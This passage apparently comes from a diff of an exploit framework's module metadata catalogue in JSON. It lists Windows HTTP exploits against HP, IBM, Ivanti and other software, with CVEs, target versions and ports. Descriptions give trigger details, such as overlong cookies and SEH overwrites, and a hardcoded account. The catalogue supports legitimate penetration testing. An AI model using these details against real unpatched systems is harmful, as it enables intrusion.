There are no stack cookies, so exploitation is easily achieved by\n overwriting the saved return address or SEH frame.\n\n This vulnerability might also be triggerable via other CGI programs, however this was\n not fully investigated.", - "references": [ - "CVE-2010-2703", - "OSVDB-66514", - "BID-41829", - "ZDI-10-137", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02286088" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "HP OpenView Network Node Manager 7.53 w/NNM_01206", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_webappmon_execvp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_webappmon_ovjavalocale": { - "name": "HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_webappmon_ovjavalocale", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-08-03", - "type": "exploit", - "author": [ - "Nahuel Riva", - "sinn3r ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a request containing a cookie longer than 5120 bytes, an attacker can overflow\n a stack buffer and execute arbitrary code.\n\n The vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n declared within this function. 
When the vulnerability is triggered, the stack trace looks\n like the following:\n\n #0 ...\n #1 sprintf_new(local_stack_buf, fmt, cookie);\n #2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n #3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n #4 sub_405ee0(\"nnm\", \"webappmon\");\n\n No validation is done on the cookie argument. There are no stack cookies, so exploitation\n is easily achieved by overwriting the saved return address or SEH frame.\n\n The original advisory detailed an attack vector using the \"OvJavaLocale\" cookie being\n passed in a request to \"webappmon.exe\". Further research shows that several different\n cookie values, as well as several different CGI applications, can be used.\n '", - "references": [ - "CVE-2010-2709", - "OSVDB-66932", - "BID-42154", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02446520", - "URL-http://www.coresecurity.com/content/hp-nnm-ovjavalocale-buffer-overflow" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "HP OpenView Network Node Manager 7.53", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_webappmon_ovjavalocale", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_openview_insight_backdoor": { - "name": "HP OpenView Performance Insight Server Backdoor Account Code Execution", - "fullname": "exploit/windows/http/hp_openview_insight_backdoor", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-01-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": 
"This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n class. When using this account, an attacker can abuse the\n com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n allowing the execution of arbitrary code.\n\n NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0", - "references": [ - "CVE-2011-0276", - "OSVDB-70754" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Windows Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_openview_insight_backdoor.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_openview_insight_backdoor", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_pcm_snac_update_certificates": { - "name": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", - "fullname": "exploit/windows/http/hp_pcm_snac_update_certificates", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-09-09", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. 
This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.", - "references": [ - "CVE-2013-4812", - "OSVDB-97155", - "BID-62348", - "ZDI-13-225" - ], - "platform": "Windows", - "arch": "java", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP ProCurve Manager 4.0 SNAC Server" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_pcm_snac_update_certificates", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_pcm_snac_update_domain": { - "name": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload", - "fullname": "exploit/windows/http/hp_pcm_snac_update_domain", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-09-09", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The\n vulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary\n files, just having into account binary writes aren't allowed. Additionally, authentication\n can be bypassed in order to upload the file. 
This module has been tested successfully on\n the SNAC server installed with HP ProCurve Manager 4.0.", - "references": [ - "CVE-2013-4811", - "OSVDB-97154", - "BID-62349", - "ZDI-13-226" - ], - "platform": "Windows", - "arch": "java", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP ProCurve Manager 4.0 SNAC Server" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_pcm_snac_update_domain", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_power_manager_filename": { - "name": "HP Power Manager 'formExportDataLogs' Buffer Overflow", - "fullname": "exploit/windows/http/hp_power_manager_filename", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-10-19", - "type": "exploit", - "author": [ - "Alin Rad Pop", - "Rodrigo Escobar ", - "sinn3r " - ], - "description": "This module exploits a buffer overflow in HP Power Manager's 'formExportDataLogs'.\n By creating a malformed request specifically for the fileName parameter, a stack-based\n buffer overflow occurs due to a long error message (which contains the fileName),\n which may result in arbitrary remote code execution under the context of 'SYSTEM'.", - "references": [ - "CVE-2009-3999", - "OSVDB-61848", - "BID-37867" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 / Win Server 2003 SP0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_power_manager_filename.rb", - "is_install_path": true, - "ref_name": 
"windows/http/hp_power_manager_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_power_manager_login": { - "name": "Hewlett-Packard Power Manager Administration Buffer Overflow", - "fullname": "exploit/windows/http/hp_power_manager_login", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-11-04", - "type": "exploit", - "author": [ - "MC ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2.\n Sending a specially crafted POST request with an overly long Login string, an\n attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-2685", - "OSVDB-59684" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_power_manager_login.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_power_manager_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_sitescope_dns_tool": { - "name": "HP SiteScope DNS Tool Command Injection", - "fullname": "exploit/windows/http/hp_sitescope_dns_tool", - "aliases": [], - "rank": 400, - "disclosure_date": "2015-10-09", - "type": "exploit", - "author": [ - "Kirk Hayes", - "Charles Riggs", - "Juan Vazquez" - ], - "description": "This module exploits a command injection vulnerability\n discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n and 11.30). The vulnerability exists in the DNS Tool allowing an\n attacker to execute arbitrary commands in the context of the service. 
By\n default, HP SiteScope installs and runs as SYSTEM in Windows and does\n not require authentication. This vulnerability only exists on the\n Windows version. The Linux version is unaffected.", - "references": [ - "URL-https://www.rapid7.com/blog/post/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection", - "URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP SiteScope 11.30 / Microsoft Windows 7 and higher", - "HP SiteScope 11.30 / CMD" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_sitescope_dns_tool", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_sitescope_runomagentcommand": { - "name": "HP SiteScope Remote Code Execution", - "fullname": "exploit/windows/http/hp_sitescope_runomagentcommand", - "aliases": [], - "rank": 0, - "disclosure_date": "2013-07-29", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in HP SiteScope.\n The vulnerability exists in the opcactivate.vbs script, which\n is reachable from the APIBSMIntegrationImpl AXIS service, and\n uses WScript.Shell.run() to execute cmd.exe with user provided\n data. Note that the opcactivate.vbs component is installed\n with the (optional) HP Operations Agent component. 
The module\n has been tested successfully on HP SiteScope 11.20 (with HP\n Operations Agent) over Windows 2003 SP2.", - "references": [ - "CVE-2013-2367", - "OSVDB-95824", - "BID-61506", - "ZDI-13-205" - ], - "platform": "Windows", - "arch": "x86", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_sitescope_runomagentcommand", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hpe_sim_76_amf_deserialization": { - "name": "HPE Systems Insight Manager AMF Deserialization RCE", - "fullname": "exploit/windows/http/hpe_sim_76_amf_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-12-15", - "type": "exploit", - "author": [ - "Harrison Neal", - "Jang", - "Grant Willcox" - ], - "description": "A remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be\n leveraged by a remote unauthenticated attacker to execute code within the context of HPE System Insight\n Manager's hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due\n to a failure to validate data during the deserialization process when a user submits a POST request to\n the /simsearch/messagebroker/amfsecure page. 
This module exploits this vulnerability by leveraging an\n outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM, to gain\n RCE as the administrative user running HPE SIM.", - "references": [ - "CVE-2020-7200", - "URL-https://testbnull.medium.com/hpe-system-insight-manager-sim-amf-deserialization-lead-to-rce-cve-2020-7200-d49a9cf143c0", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-20-1449/", - "URL-https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us" - ], - "platform": "Windows", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/http/hpe_sim_76_amf_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/hpe_sim_76_amf_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/httpdx_handlepeer": { - "name": "HTTPDX h_handlepeer() Function Buffer Overflow", - "fullname": "exploit/windows/http/httpdx_handlepeer", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-10-08", - "type": "exploit", - "author": [ - "Pankaj Kohli ", - "Trancer ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. 
The\n vulnerability is caused due to a boundary error within the \"h_handlepeer()\" function in http.cpp.\n By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.", - "references": [ - "OSVDB-58714", - "CVE-2009-3711", - "URL-http://www.pank4j.com/exploits/httpdxb0f.php", - "URL-http://www.rec-sec.com/2009/10/16/httpdx-buffer-overflow-exploit/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "httpdx 1.4 - Windows XP SP3 English", - "httpdx 1.4 - Windows 2003 SP2 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/httpdx_handlepeer.rb", - "is_install_path": true, - "ref_name": "windows/http/httpdx_handlepeer", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/httpdx_tolog_format": { - "name": "HTTPDX tolog() Function Format String Vulnerability", - "fullname": "exploit/windows/http/httpdx_tolog_format", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-11-17", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a format string vulnerability in HTTPDX HTTP server.\n By sending a specially crafted HTTP request containing format specifiers, an\n attacker can corrupt memory and execute arbitrary code.\n\n By default logging is off for HTTP, but enabled for the 'moderator' user\n via FTP.", - "references": [ - "CVE-2009-4769", - "OSVDB-60182" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "httpdx 1.4 - Windows XP SP3 English", - "httpdx 1.4.5 - 
Windows XP SP3 English", - "httpdx 1.4.6 - Windows XP SP3 English", - "httpdx 1.4.6b - Windows XP SP3 English", - "httpdx 1.5 - Windows XP SP3 English", - "Debug target" - ], - "mod_time": "2023-05-30 10:56:41 +0000", - "path": "/modules/exploits/windows/http/httpdx_tolog_format.rb", - "is_install_path": true, - "ref_name": "windows/http/httpdx_tolog_format", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ia_webmail": { - "name": "IA WebMail 3.x Buffer Overflow", - "fullname": "exploit/windows/http/ia_webmail", - "aliases": [], - "rank": 200, - "disclosure_date": "2003-11-03", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This exploits a stack buffer overflow in the IA WebMail server.\n This exploit has not been tested against a live system at\n this time.", - "references": [ - "CVE-2003-1192", - "OSVDB-2757", - "BID-8965", - "URL-http://www.k-otik.net/exploits/11.19.iawebmail.pl.php" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "IA WebMail 3.x" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ia_webmail.rb", - "is_install_path": true, - "ref_name": "windows/http/ia_webmail", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ibm_tivoli_endpoint_bof": { - "name": "IBM Tivoli Endpoint Manager POST Query Buffer Overflow", - "fullname": "exploit/windows/http/ibm_tivoli_endpoint_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-05-31", - "type": "exploit", - "author": [ - "bannedit ", - "Jeremy Brown <0xjbrown@gmail.com>" - ], - "description": "This module exploits a stack based buffer 
overflow in the way IBM Tivoli\n Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query\n arguments.\n\n This issue can be triggered by sending a specially crafted HTTP POST request to\n the service (lcfd.exe) listening on TCP port 9495. To trigger this issue authorization\n is required. This exploit makes use of a second vulnerability, a hardcoded account\n (tivoli/boss) is used to bypass the authorization restriction.", - "references": [ - "CVE-2011-1220", - "OSVDB-72713", - "OSVDB-72751", - "BID-48049", - "ZDI-11-169" - ], - "platform": "Windows", - "arch": "", - "rport": 9495, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows Server 2003 SP0", - "Windows Server 2003 SP1", - "Windows Server 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/ibm_tivoli_endpoint_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ibm_tpmfosd_overflow": { - "name": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", - "fullname": "exploit/windows/http/ibm_tpmfosd_overflow", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-05-02", - "type": "exploit", - "author": [ - "toto" - ], - "description": "This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n for OS Deployment version 5.1.0.X.", - "references": [ - "CVE-2007-1868", - "OSVDB-34678", - "BID-23264", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-05" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - 
"TPMfOSD 5.1 (Windows 2000 SP4 - English)", - "TPMfOSD 5.1 (Windows 2003 All - English)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/ibm_tpmfosd_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ibm_tsm_cad_header": { - "name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow", - "fullname": "exploit/windows/http/ibm_tsm_cad_header", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-09-24", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).\n By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.", - "references": [ - "CVE-2007-4880", - "OSVDB-38161", - "BID-25743" - ], - "platform": "Windows", - "arch": "", - "rport": 1581, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Tivoli Storage Manager Express 5.3.3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ibm_tsm_cad_header.rb", - "is_install_path": true, - "ref_name": "windows/http/ibm_tsm_cad_header", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/icecast_header": { - "name": "Icecast Header Overwrite", - "fullname": "exploit/windows/http/icecast_header", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-09-28", - "type": "exploit", - "author": [ - "spoonm ", - "Luigi Auriemma " - ], - "description": "This module exploits a buffer overflow in the header parsing of icecast\n versions 2.0.1 and earlier, discovered by Luigi Auriemma. 
Sending 32\n HTTP headers will cause a write one past the end of a pointer array. On\n win32 this happens to overwrite the saved instruction pointer, and on\n linux (depending on compiler, etc) this seems to generally overwrite\n nothing crucial (read not exploitable).\n\n This exploit uses ExitThread(), this will leave icecast thinking the\n thread is still in use, and the thread counter won't be decremented.\n This means for each time your payload exits, the counter will be left\n incremented, and eventually the threadpool limit will be maxed. So you\n can multihit, but only till you fill the threadpool.", - "references": [ - "CVE-2004-1561", - "OSVDB-10406", - "BID-11271", - "URL-http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/icecast_header.rb", - "is_install_path": true, - "ref_name": "windows/http/icecast_header", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/integard_password_bof": { - "name": "Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow", - "fullname": "exploit/windows/http/integard_password_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-09-07", - "type": "exploit", - "author": [ - "Lincoln", - "Nullthreat", - "rick2600", - "corelanc0d3r ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Race river's Integard Home/Pro\n internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n vulnerable.\n\n The administration web page on port 18881 is vulnerable to a remote buffer overflow\n attack. 
By sending a long character string in the password field, both the structured\n exception handler and the saved extended instruction pointer are over written, allowing\n an attacker to gain control of the application and the underlying operating system\n remotely.\n\n The administration website service runs with SYSTEM privileges, and automatically\n restarts when it crashes.", - "references": [ - "OSVDB-67909", - "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061" - ], - "platform": "Windows", - "arch": "", - "rport": 18881, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "Integard Home 2.0.0.9021", - "Integard Pro 2.2.0.9026" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/integard_password_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/integard_password_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/intersystems_cache": { - "name": "InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow", - "fullname": "exploit/windows/http/intersystems_cache", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-09-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.", - "references": [ - "OSVDB-60549", - "BID-37177" - ], - "platform": "Windows", - "arch": "", - "rport": 57772, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
"/modules/exploits/windows/http/intersystems_cache.rb", - "is_install_path": true, - "ref_name": "windows/http/intersystems_cache", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/intrasrv_bof": { - "name": "Intrasrv 1.0 Buffer Overflow", - "fullname": "exploit/windows/http/intrasrv_bof", - "aliases": [], - "rank": 0, - "disclosure_date": "2013-05-30", - "type": "exploit", - "author": [ - "xis_one", - "PsychoSpy " - ], - "description": "This module exploits a boundary condition error in Intrasrv Simple Web\n Server 1.0. The web interface does not validate the boundaries of an\n HTTP request string prior to copying the data to an insufficiently sized\n buffer. Successful exploitation leads to arbitrary remote code execution\n in the context of the application.", - "references": [ - "OSVDB-94097", - "EDB-18397", - "BID-60229" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "v1.0 - XP / Win7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/intrasrv_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/intrasrv_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ipswitch_wug_maincfgret": { - "name": "Ipswitch WhatsUp Gold 8.03 Buffer Overflow", - "fullname": "exploit/windows/http/ipswitch_wug_maincfgret", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-08-25", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. 
By\n posting a long string for the value of 'instancename' in the _maincfgret.cgi\n script an attacker can overflow a buffer and execute arbitrary code on the system.", - "references": [ - "CVE-2004-0798", - "OSVDB-9177", - "BID-11043" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "WhatsUP Gold 8.03 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb", - "is_install_path": true, - "ref_name": "windows/http/ipswitch_wug_maincfgret", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ivanti_avalanche_filestoreconfig_upload": { - "name": "Ivanti Avalanche FileStoreConfig File Upload", - "fullname": "exploit/windows/http/ivanti_avalanche_filestoreconfig_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-04-24", - "type": "exploit", - "author": [ - "Piotr Bazydlo", - "Shelby Pace" - ], - "description": "Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short\n names in the configuration path for the Central FileStore. 
Because of\n this, an administrator can change the default path to the web root\n of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-456/", - "URL-https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US", - "URL-https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128", - "CVE-2023-28128" - ], - "platform": "Java,Windows", - "arch": "java", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2023-05-12 16:08:47 +0000", - "path": "/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/ivanti_avalanche_filestoreconfig_upload", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/ivanti_epm_recordgoodapp_sqli_rce": { - "name": "Ivanti EPM RecordGoodApp SQLi RCE", - "fullname": "exploit/windows/http/ivanti_epm_recordgoodapp_sqli_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-05-24", - "type": "exploit", - "author": [ - "James Horseman", - "Christophe De La Fuente" - ], - "description": "Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.", - "references": [ - 